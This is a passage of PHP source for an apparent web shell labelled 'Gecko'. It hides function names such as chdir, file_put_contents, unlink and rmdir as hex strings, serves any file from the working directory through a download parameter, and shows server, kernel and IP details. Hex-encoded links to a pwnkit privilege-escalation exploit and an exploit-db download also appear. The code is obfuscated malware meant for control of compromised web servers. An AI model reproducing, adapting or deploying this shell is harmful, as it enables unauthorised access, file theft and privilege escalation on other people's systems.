9
'6368646972', // c h d i r => 10
'7068705f756e616d65', // p h p _ u n a m e => 11
'6973736574',
'66756e6374696f6e5f657869737473',
'5f6d61645f636d64',
'245f5345525645525b275345525645525f4e414d45275d',
'676c6f62', // g l o b => 16
'69735f66696c65', // i s _ f i l e => 17
'69735f646972', // i s _ d i r => 18
'69735f7772697461626c65', // i s _ w r i t e a b l e => 19
'69735f7265616461626c65', // i s _ r e a d b l e => 20
'66696c6573697a65', // f i l e _ s i z e => 21
'6765745f63757272656e745f75736572', // user => 22
'5345525645525f534f465457415245', // Server Software => 23
'66696c656d74696d65', // f i l e m t i m e => 24
'746f756368', // t o u c h => 25
'6d6b646972', // m k d i r => 26
'66696c655f6765745f636f6e74656e7473', // f i l e g e t c o n t e n t s => 27
'66696c655f7075745f636f6e74656e7473', // f i l e p u t => 28
'726d646972', // r m d i r => 29
'756e6c696e6b', // u n l i n k => 30
'66696c65', // f i l e => 31
'6d756c7469706172742f666f726d2d64617461', // m u l t i p a r t / f o r m d a t a => 32
'444f43554d454e545f524f4f54', // r o o t d o c => 33
'68747470733a2f2f6769746875622e636f6d2f4d61644578706c6f6974732f50726976656c6567652d657363616c6174696f6e2f7261772f6d61696e2f70776e6b6974', // Source maybe? => 34
'68747470733a2f2f7777772e6578706c6f69742d64622e636f6d2f646f776e6c6f61642f3430383339' // ex => 35
];
$hitung_array = count($Array);
for ($i = 0; $i < $hitung_array; $i++) {
$fungsi[] = unhex($Array[$i]);
}
if (!empty($_GET['download'])) {
$nameNyafile = basename($_GET['download']);
$pathFilenya = $fungsi[9]() . "/" . $nameNyafile;
if (!empty($nameNyafile) && file_exists($pathFilenya)) {
// Define Headers
header('Cache-control: public');
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $nameNyafile . '"');
header('Content-Transfer-Encoding: binary');
readfile($pathFilenya);
exit;
}
}
?>
Gecko [ = $_SERVER['HTTP_HOST']; ?> ]
= $fungsi[11](); ?>
= $_SERVER[$fungsi[23]]; ?>
Server IP : = $_SERVER['SERVER_ADDR']; ?> & Your IP : = $_SERVER['REMOTE_ADDR']; ?>